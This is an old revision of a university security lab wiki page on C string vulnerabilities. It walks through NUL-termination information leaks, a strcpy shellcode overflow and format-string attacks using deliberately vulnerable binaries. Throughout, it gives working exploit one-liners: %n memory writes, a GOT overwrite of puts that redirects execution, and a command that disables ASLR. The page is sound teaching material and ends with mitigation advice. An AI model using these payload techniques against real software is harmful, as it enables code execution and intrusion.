This is an old revision of the document!


Lab 09 - Strings

Resources

Lab Support Files

We will use this lab archive throughout the lab.

Please download the lab archive an then unpack it using the commands below:

student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz
student@mjolnir:~$ tar xzf lab-09.tar.gz

After unpacking we will get the lab-09/ folder that we will use for the lab:

student@mjolnir:~$ cd lab-09/
student@mjolnir:~/lab-09$ ls
basic-format-string  basic-info-leak
format-string  info-leak
printf-features  string-shellcode

Intro

This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) are using classes to represent strings – this simplifies the way strings are handled and decreases the frequency of programming errors.

What is a string?

Conceptually, a string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous memory buffer. Each character is encoded in a way. For example the ASCII encoding uses 7-bit integers to encode each character – because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte.

The type for representing an ASCII character in C is char and it uses one byte. As a side note, sizeof(char) == 1 is the only guarantee that the C standard gives.

Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, more than one byte is needed for one character. char16_t, char32_t were introduced in the C standard to represent these strings. The C language also has another type, called wchar_t, which is implementation defined and should not be used to represent Unicode characters.

Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that are assuming a specific encoding of the string.

You will find extensive information on ASCII in the ascii man page. Inside an Unix terminal issue the command

man ascii

Length management

In C, the length of an ASCII string is given by its contents. An ASCII string ends with a 0 value byte called the NUL byte. Every str* function (i.e. a function with the name starting with str, such as strcpy, strcat, strdup, strstr etc.) uses this 0 byte to detect where the string ends. As a result, not ending strings in 0 and using str* functions leads to vulnerabilities.

[1p] Basic Info Leak (tutorial)

Enter the basic-info-leak/ subfolder in the lab archive. It's a basic information leak example.

In basic_info_leak.c, buf is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives 32 bytes as input then strcpy will copy bytes in my_string until it finds a NUL byte (0x00). Because the stack grows down, on most platforms, we will start accessing the content of the stack. After the buf variable the stack stores the old ebp, the function return address and then the function parameters. This information is copied into my_string. As such, printing information in my_string (after byte index 32) using puts() results in information leaks.

We can test this using:

$ python -c 'print "A"*32' | ./basic_info_leak 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����

In order to check the hexadecimal values of the leak, we pipe the output through xxd:

$ python -c 'print "A"*32' | ./basic_info_leak | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 786d 99ff f184 0408 0a

We have leaked two values above:

  • the old/stored ebp value (right after the buffer): 0xff996d78 (it's a little endian architecture); it will differ on your system
  • the my_main() return address: 0x080484f1

The return address usually doesn't change (except for executables with PIE, Position Independent Executable support). But assuming ASLR is enabled, the ebp value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the Information Leak task.

[2.5p] Recap: String Shellcode

For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.

In the string-shellcode/ subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode. The original source code is string_shellcode.c. There is an obvious vulnerability when using strcpy() that will lead to an overflow and a rewrite of the get_num_alpha() function return address when called with a large enough number of characters in g_buffer.

Fill the TODO spots in the exploit.py script to inject and execute a shell.

ASLR is on. The shellcode will be stored at the beginning of the g_buffer global variable which has a constant address. You can determine it using:

nm string_shellcode | grep ' g_buffer'

Use GDB PEDA and pattc and patto to determine the offset between l_buffer and the get_num_alpha() function return address.

In GDB/PEDA in order to send a given string (such as the pattern outputted by pattc) to the program standard input, use the process substitution construct:

gdb-peda$ r < <(echo 'AAAA.....')

Construct the payload as usual: add the shellcode, add padding and overwrite the get_num_alpha() function return address with the address of the shellcode (i.e. the address of the g_buffer) global variable.

[3.5p] Information Leak

We will now show how improper string handling will lead to information leaks from the memory. For this, please access the info-leak/ subfolder in the lab archive. Please browse the info-leak.c source code file. The executable file is already generated in info-leak (a 32-bit ELF file).

The snippet below is the relevant code snippet. The goal is to call the my_evil_func() function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the my_evil_func() function by overriding the return address of the my_main() function:

#define NAME_SZ 32
 
static void read_name(char *name)
{
	memset(name, 0, NAME_SZ);
	read(0, name, NAME_SZ);
	//name[NAME_SZ-1] = 0;
}
 
static void my_main(void)
{
	char name[NAME_SZ];
 
	read_name(name);
	printf("hello %s, what address to modify and with what value?\n", name);
	fflush(stdout);
	my_memory_write();
	printf("Returning from main!\n");
}

What catches our eye is that the read() function call in the read_name() function read exactly 32 bytes. If we provide it 32 bytes it won't be null-terminated and will result in an information leak when printf() is called in the my_main() function.

Exploiting the memory write using the info leak

Let's first try to see how the program works:

$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak 
hello AAAAAAAAAA, what address to modify and with what value?

The binary wants an input from the user using the read() library call as we can see below:

$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak
strace: [ Process PID=7736 runs in 32 bit mode. ]
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
read(0, "AAAAAAAAAA", 32)               = 10
hello AAAAAAAAAA, what address to modify and with what value?
read(0, "", 4)                          = 0
+++ exited with 255 +++

The input is read using the read() system call. The first read expects 32 bytes. You can see already that there's another read() call. That one is the first read() call in the my_memory_write() function.

As noted above, if we use exactly 32 bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak
hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value?
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd
00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 58da e0ff 0586 0408 2c20  AAAAAAX......., 
00000030: 7768 6174 2061 6464 7265 7373 2074 6f20  what address to 
00000040: 6d6f 6469 6679 2061 6e64 2077 6974 6820  modify and with 
00000050: 7768 6174 2076 616c 7565 3f0a            what value?.

We see we have an information leak. We leak two pieces of data above: 0xff30da58 (little endian representation) and 0x08048605. The first one seems to be a stack address and the second one a code/text address.

If we run multiple times we can see that the values for the first piece of information differs:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 18e8 9fff 0586 0408 2c20  AAAAAA........, 
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 4879 ccff 0586 0408 2c20  AAAAAAHy......, 
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 9867 9bff 0586 0408 2c20  AAAAAA.g......,

The variable part is related to a stack address (it starts with 0xff); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:

$ gdb -q ./info_leak
Reading symbols from ./info_leak...done.
gdb-peda$ b printf
Breakpoint 1 at 0x80483c0
gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")')
Starting program: /home/razvan/school/2012-2013/oss/repo.git/labs/lab-09/info-leak/info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")')
[...]
 
Breakpoint 1, 0xf7e2a8f0 in printf () from /lib/i386-linux-gnu/libc.so.6
gdb-peda$ bt
#0  0xf7e2a8f0 in printf () from /lib/i386-linux-gnu/libc.so.6
#1  0x080485d7 in my_main () at info_leak.c:43
#2  0x08048605 in main () at info_leak.c:51
#3  0xf7df9276 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#4  0x08048451 in _start ()
gdb-peda$ up
#1  0x080485d7 in my_main () at info_leak.c:43
43		printf("hello %s, what address to modify and with what value?\n", name);
gdb-peda$ x/12wx name
0xffffd270:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd280:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd290:	0xffffd298	0x08048605	0x00000000	0xf7df9276
gdb-peda$ x/2i 0x08048605
   0x8048605 <main+8>:	push   0x8048710
   0x804860a <main+13>:	call   0x80483e0 <puts@plt>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x080485fd <+0>:	push   ebp
   0x080485fe <+1>:	mov    ebp,esp
   0x08048600 <+3>:	call   0x80485b7 <my_main>
   0x08048605 <+8>:	push   0x8048710
   0x0804860a <+13>:	call   0x80483e0 <puts@plt>
   0x0804860f <+18>:	add    esp,0x4
   0x08048612 <+21>:	mov    eax,0x0
   0x08048617 <+26>:	leave  
   0x08048618 <+27>:	ret    
End of assembler dump.
gdb-peda$  

From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ebp (i.e. old ebp) and one value is the return address of the my_main() function (that gets it back to main()).

When we leak the two values we are able to retrieve the stored ebp value. In the above run the value of ebp is 0xffffd298. We also see that the stored ebp value is stored at address 0xffffd290, which is the address current ebp. We have the situation in the below diagram:

We marked the stored ebp value (i.e. the frame pointer for main(): 0xffffd298) with the font color red in both places.

In short, if we leak the value of the stored ebp (i.e. the frame pointer for main(): 0xffffd298) we can determine the address where the current ebp (i.e. the frame pointer for my_main(): 0xffffd290) by subtracting 8. The address where the my_main() return address is stored (0xffffd294) is computed by subtracting 4 from the leaked ebp value. By overwriting the value at this address we will force an arbitrary code execution and call my_evil_func().

In order to write the the return address of the my_main() function with the address of the my_evil_func() function, make use of the conveniently (but not realistically) placed my_memory_write() function.

Considering all of this, update the TODO lines of the exploit.py script to make it call the my_evil_func() function.

Same as above, use nm to determine address of the my_evil_func() function.

Use the above logic to determine the old ebp leak and then the address of the my_main() return address.

See here examples of using the unpack() function.

In case of a successful exploit the program will return with the 42 error code in the my_evil_func() function, same as below:

$ python exploit.py 
[+] Starting local process '../info_leak': Done
[*] old_ebp is 0xffd66228
[*] return address is located at is 0xffd66224
[*] Process '../info_leak' stopped with exit code 42

The rule of thumb is: Always know your string length.

Format String Attacks

We will now see how (im)proper use of printf may provide us with ways of extracting information or doing actual attacks.

Calling printf or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called format string attack.

The definition of printf:

int printf(const char *format, ...);

Let's recap some of useful formats:

  • %08x – prints a number in hex format, meaning takes a number from the stack and prints in hex format
  • %s – prints a string, meaning takes a pointer from the stack and prints the string from that address
  • %n – writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.

%x and %n are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.

Example 2

printf(my_string);

The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker.

Try to think about:

  • The peculiarities of printf (variable number of arguments)
  • Where printf stores its arguments (hint: on the stack)
  • What happens when my_string is "%x"
  • How matching between format strings (e.g. the one above) and arguments is enforced (hint: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers
  • How we could use this to cause information leaks and arbitrary memory writes (hint: see the format specifiers at the beginning of the section)

[1p] Example 3

We would like to check some of the well known and not so-well known features of the printf function. Some of them may be used for information leaking and for attacks such as format string attacks.

Go into printf-features/ subfolder and browse the printf-features.c file. Compile the executable file using:

make

and then run the resulting executable file using

./printf-features

Go through the printf-features.c file again and check how print, length and conversion specifiers are used by printf. We will make use of the %n feature that allows memory writes, a requirement for attacks.

[2p] Basic Format String Attack

You will now do a basic format string attack using the basic-format-string/ subfolder in the lab archive. The source code is in basic_format_string.c and the executable is in basic_format_string.

You need to use %n to overwrite the value of the v variable to 100. You have to do three steps:

  1. Determine the address of the v variable using nm.
  2. Determine the n-th parameter of printf() that you can write to using %n. The buffer variable will have to be that parameter; you will store the address of the v variable in the buffer variable.
  3. Construct a format string that enables the attack; the number of characters processed by printf() until %n is matched will have to be 100.

For the second step let's run the program multiple times and figure out where the buffer address starts. We fill buffer with the aaaa string and we expect to discover it using the printf() format specifiers.

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx
f76f65a0ffd559a0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f75718700000000a

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%llx
f76fa5a0ffc4e5c0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f757000a786c6c25616161610804856b

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%lx
f77115a0ffa03f30786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f758c8000a786c25804856b

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%lx%lx
f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b61616161

In the last run we get the 61616161 representation of aaaa. That means that, if we replace the final %lx with %n, we will write the address 0x61616161 the number of characters processed so far:

$ echo -n 'f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b' | wc -c
84

We need that number to be 100. You can fine tune the format string by using a construct such as %32llx to print a number on 32 characters instead of a maximum of 16 characters. See how much extra room you need and see if you reach 100 bytes.

The construct needn't use a multiple of 8 for length. You may use the %32llx or %33llx or %42llx. The numeric argument states the length of the print output.

After the plan is complete, write down the attack by filling the TODO lines in the exploit.py solution skeleton.

[3p] Extra: Format String Attack

The goal of this task is to call my_evil_func again. This task is also tutorial based.

int
main(int argc, char *argv[])
{
	printf(argv[1]);
	printf("\nThis is the most useless and insecure program!\n");
	return 0;
}

Transform Format String Attack to a Memory Write

Any string that represents a useful format (e.g. %d, %x etc.) can be used to discover the vulnerability.

$ ./format "%08x %08x %08x %08x"
00000000 f759d4d3 00000002 ffd59bd4
This is the most useless and insecure program!

The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as a information leakage. But we want more.

Another useful format for us is %m$ followed by any normal format selector. Which means that the mth parameter is used as an input for the following format. %10$08x will print the 10th paramater with %08x. This allows us to do a precise access of the stack.

Example:

$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x"
00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24
This is the most useless and insecure program!

Note the equivalence between formats.

Now, because we are able to select any higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.

$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')" 

Depending on your setup you should be able to view the hex representation of the string ”%08x\n”.

Why do we need our own buffer? Remember the %n format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.

The next steps are done with ASLR disabled. In order to disable ASLR, please run

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

By trial and error or by using GDB (breakpoint on printf) we can determine

$ ./format "$(perl -e 'printf "A"x512 . "%%08x   \x0a"x200')"  | grep -n 41 | head
17:415729ac   
56:ffffdd41   
128:41007461   
129:41414141   
130:41414141 

Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner.

#!/usr/bin/env perl
 
use strict;
use warnings;
use v5.20;
 
my $stack_items = 1000;
 
printf "A" x 512;
printf "%%08x   \x0a" x $stack_items;

Then call the format using (note the enclosing double-quotes):

$ ./format "$(perl exploit.pl)"

One idea is to keep things in multiple of 4, like I did for ”%08x \x0a”. If you are looking at line 128, one of our As is there. Because the machine is little endian, the 0x41 appears as most significant byte. We want to fix this, to have our buffer aligned. Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).

We can compress our buffer by specifying the position of the argument.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')"
BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342
This is the most useless and insecure program!

You can see that the last information is our “BCDE” string printed with %08x this means that we know where's our buffer.

You need to enable core dumps in order to reproduce the steps below:

$ ulimit -c unlimited

The steps below work an a given version of libc and a given system. It's why the instruction that causes the fault is

mov %edx,(%eax)

or the equivalent in Intel syntax

mov DWORD PTR [eax], edx

It may be different on your system, for example edx may be replaced by esi, cuch as

mov DWORD PTR [eax], esi

Update the explanations below accordingly.

Remove any core files you may have generated before testing your program:

rm -f core

We can replace %08x with %n this should lead to segmentation fault.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
...
Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18
(gdb) x/i $eip
=> 0xf7e580a2 <vfprintf+17906>:	mov    %edx,(%eax)
(gdb) info registers $edx $eax
edx            0x202	514
eax            0x45444342	1162101570
(gdb) quit

Bingo. We have memory write. The vulnerable code tried to write at the address 0x45444342 (“BCDE” little endian) the value 514. The value 514 is the amount of data wrote so far by printf (510 As and “BCDE”).

Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.

$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
(gdb) info registers $edx $eax
edx            0x261	609
eax            0x45444342	1162101570
(gdb) quit

Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one A. You can try this by yourself.

How far can we go? Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with snprintf. 255 should be enough.

Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. The idea is to write at the address n and then at the address n+1 and so on.

Lets first display the address. We are using the address 0x804a008. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts.

$ objdump -R ./format | grep puts
0804a008 R_386_JUMP_SLOT   puts
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x"')"
 
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
0|0804a008
f7e2a4d3|0804a009
2|0804a00a
ffffd2c4|0804a00b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program!

Why are we printing 498 As? We added 12 bytes before our format and 6 extra bytes for the output – the | is there only for pretty print. We want to keep in place the first argument – anyway, you should always check this.

Lets replace the %x with %n

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
Program terminated with signal 11, Segmentation fault.
#0  0x02020202 in ?? ()
(gdb) x/x 0x0804a000
0x804a000 <printf@got.plt>:	0xf7e5ded0
(gdb) x/x 0x0804a004
0x804a004 <fwrite@got.plt>:	0x08048396
(gdb) x/x 0x0804a008
0x804a008 <puts@got.plt>:	0x02020202
(gdb) x/x 0x0804a00c
0x804a00c <__gmon_start__@got.plt>:	0x08000006
(gdb) 

In the gdb session above you can see:

  1. the got entry for printf points to a library address (the address starts with 0xf)
  2. the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet.
  3. the puts entry points to 0x02020202. This is the value that we wrote.

How come we wrote the first 0x02? Just before executing the first %n the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.

How come the rest of the bytes are 0x02? After executing the first %n we printed another 256 bytes before each %n so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes __gmon_start__@got.plt are 0x000006.

We want to put the value 0x08048494.

$ objdump -d ./format | grep my_evil
08048494 <my_evil_func>:

The first byte is 0x94 (little endian), recall that we were able to write 0x02, writing 0x94 means replacing first 255 with 255-(0x102-0x94) == 145.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
#0  0x94949494 in ?? ()
(gdb) quit

The next byte that we want to write is 0x84 so we need to replace 255 with 235. We can continue this idea until we profit.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null
I'm evil, but nobody calls me :-(

[1p] Bonus task Can you get a shell? (Assume ASLR is disabled).

Mitigation and Recommendations

  1. Manage the string length carefully
  2. Don't use gets. With gets there is no way of knowing how much data was read
  3. Use string functions with n parameter, whenever a non constant string is involved. i.e. strnprintf, strncat.
  4. Make sure that the NUL byte is added, for instance strncpy does not add a NUL byte.
  5. Use wcstr* functions when dealing with wide char strings.
  6. Don't trust the user!

Real life Examples

cns/labs/lab-09.1512400614.txt.gz · Last modified: 2017/12/04 17:16 by razvan.deaconescu
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0